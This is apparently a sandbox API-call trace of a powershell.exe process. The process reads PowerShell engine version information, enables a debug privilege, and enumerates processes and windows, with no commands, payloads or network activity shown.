	[0941.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ade50 | out: lpFileInformation=0x1ade50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.530] SetErrorMode (uMode=0x1) returned 0x1
	[0941.793] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ae0c0 | out: lpdwHandle=0x1ae0c0) returned 0x94c
	[0941.795] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2da72f0 | out: lpData=0x2da72f0) returned 1
	[0941.797] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ae038, puLen=0x1ae030 | out: lplpBuffer=0x1ae038*=0x2da738c, puLen=0x1ae030) returned 1
	[0941.799] lstrlenW (lpString="䅁") returned 1
	[0941.807] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da7468, puLen=0x1adfa0) returned 1
	[0941.807] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.809] CoTaskMemAlloc (cb=0x2e) returned 0x3e6b20
	[0941.809] lstrcpyW (in: lpString1=0x3e6b20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.810] CoTaskMemFree (pv=0x3e6b20) 
	[0941.810] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da74bc, puLen=0x1adfa0) returned 1
	[0941.810] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.810] CoTaskMemAlloc (cb=0x3c) returned 0x39ff00
	[0941.810] lstrcpyW (in: lpString1=0x39ff00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.810] CoTaskMemFree (pv=0x39ff00) 
	[0941.810] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da7518, puLen=0x1adfa0) returned 1
	[0941.810] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.810] CoTaskMemAlloc (cb=0x20) returned 0x3ec1d0
	[0941.810] lstrcpyW (in: lpString1=0x3ec1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.810] CoTaskMemFree (pv=0x3ec1d0) 
	[0941.810] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da7558, puLen=0x1adfa0) returned 1
	[0941.810] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.810] CoTaskMemAlloc (cb=0x44) returned 0x39ff00
	[0941.810] lstrcpyW (in: lpString1=0x39ff00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.810] CoTaskMemFree (pv=0x39ff00) 
	[0941.810] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da75c0, puLen=0x1adfa0) returned 1
	[0941.810] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.810] CoTaskMemAlloc (cb=0x76) returned 0x38f2e0
	[0941.810] lstrcpyW (in: lpString1=0x38f2e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.811] CoTaskMemFree (pv=0x38f2e0) 
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da765c, puLen=0x1adfa0) returned 1
	[0941.811] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.811] CoTaskMemAlloc (cb=0x44) returned 0x39ff00
	[0941.811] lstrcpyW (in: lpString1=0x39ff00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.811] CoTaskMemFree (pv=0x39ff00) 
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da76c0, puLen=0x1adfa0) returned 1
	[0941.811] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.811] CoTaskMemAlloc (cb=0x58) returned 0x345740
	[0941.811] lstrcpyW (in: lpString1=0x345740, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.811] CoTaskMemFree (pv=0x345740) 
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da773c, puLen=0x1adfa0) returned 1
	[0941.811] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.811] CoTaskMemAlloc (cb=0x20) returned 0x3ec1d0
	[0941.811] lstrcpyW (in: lpString1=0x3ec1d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.811] CoTaskMemFree (pv=0x3ec1d0) 
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2da73e4, puLen=0x1adfa0) returned 1
	[0941.811] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.811] CoTaskMemAlloc (cb=0x66) returned 0x36c2f0
	[0941.811] lstrcpyW (in: lpString1=0x36c2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.811] CoTaskMemFree (pv=0x36c2f0) 
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x0, puLen=0x1adfa0) returned 0
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x0, puLen=0x1adfa0) returned 0
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x0, puLen=0x1adfa0) returned 0
	[0941.811] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adf78, puLen=0x1adf70 | out: lplpBuffer=0x1adf78*=0x2da738c, puLen=0x1adf70) returned 1
	[0941.812] CoTaskMemAlloc (cb=0x204) returned 0x391e70
	[0941.812] VerLanguageNameW (in: wLang=0x0, szLang=0x391e70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.814] CoTaskMemFree (pv=0x391e70) 
	[0941.814] VerQueryValueW (in: pBlock=0x2da72f0, lpSubBlock="\\", lplpBuffer=0x1adfc8, puLen=0x1adfc0 | out: lplpBuffer=0x1adfc8*=0x2da7318, puLen=0x1adfc0) returned 1
	[0941.817] GetCurrentProcessId () returned 0x1b60
	[0941.823] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1acef0 | out: lpLuid=0x1acef0*(LowPart=0x14, HighPart=0)) returned 1
	[0942.183] GetCurrentProcess () returned 0xffffffffffffffff
	[0942.184] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acf10 | out: TokenHandle=0x1acf10*=0x2d0) returned 1
	[0942.185] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2daab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0942.186] CloseHandle (hObject=0x2d0) returned 1
	[0942.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b60) returned 0x2d0
	[0942.200] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2daabd0, cb=0x200, lpcbNeeded=0x1adf28 | out: lphModule=0x2daabd0, lpcbNeeded=0x1adf28) returned 1
	[0942.202] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2daae40, cb=0x18 | out: lpmodinfo=0x2daae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0942.203] CoTaskMemAlloc (cb=0x804) returned 0x3ed240
	[0942.203] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x3ed240, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0942.203] CoTaskMemFree (pv=0x3ed240) 
	[0942.204] CoTaskMemAlloc (cb=0x804) returned 0x3ed240
	[0942.204] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x3ed240, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0942.204] CoTaskMemFree (pv=0x3ed240) 
	[0942.205] CloseHandle (hObject=0x2d0) returned 1
	[0942.213] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1b60) returned 0x2d0
	[0942.214] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x1ae058 | out: lpExitCode=0x1ae058*=0x103) returned 1
	[0942.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dab088, Length=0x20000, ResultLength=0x1ae020 | out: SystemInformation=0x12dab088, ResultLength=0x1ae020*=0x4a050) returned 0xc0000004
	[0942.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dcb0b8, Length=0x4c850, ResultLength=0x1ae020 | out: SystemInformation=0x12dcb0b8, ResultLength=0x1ae020*=0x4a050) returned 0x0
	[0942.496] EnumWindows (lpEnumFunc=0x2d266ac, lParam=0x0) 
	[0942.498] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.498] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x558
	[0942.498] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.498] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.498] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x538
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x778
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x778
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.499] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x460
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4d0
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2440
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x24d8
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1aa4
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1ff0
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1a84
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1fb0
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1e10
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x23a8
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1f24
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x21ec
	[0942.500] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2320
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1fd4
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1880
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b18
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1d6c
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x233c
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2368
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2124
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x22f0
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x22ac
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1cdc
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x10f0
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1f18
	[0942.501] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x20a8
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2004
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1f88
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1f84
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x2050
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1e04
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1ecc
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1e64
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b58
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1e94
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1e28
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1df8
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1da8
	[0942.502] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1c70
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x163c
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1a10
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x186c
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1d74
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x4c8
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1960
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1ce4
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b24
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x14e0
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x17f0
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x854
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1268
	[0942.503] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1624
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b9c
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x16f4
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x145c
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x17d0
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1d28
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xcb8
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1190
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x3a8
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1bd0
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1bfc
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1a78
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b90
	[0942.504] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b04
	[0942.505] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b34
	[0942.505] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1b64
	[0942.505] GetWindow (hWnd=0x1088e, uCmd=0x4) returned 0x0
	[0942.506] IsWindowVisible (hWnd=0x1088e) returned 0
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1bb0
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1acc
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1a2c
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x19a8
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1944
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x18c8
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x18ac
	[0942.506] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x18ec
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1898
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0xc98
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x153c
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1808
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x12a4
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1740
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x16c4
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1820
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x16ac
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1858
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1664
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x10b4
	[0942.507] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x10ac
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x10ec
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1068
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x17e0
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x102c
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x17a4
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1050
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1694
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1770
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x1720
	[0942.508] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1add80 | out: lpdwProcessId=0x1add80) returned 0x165c
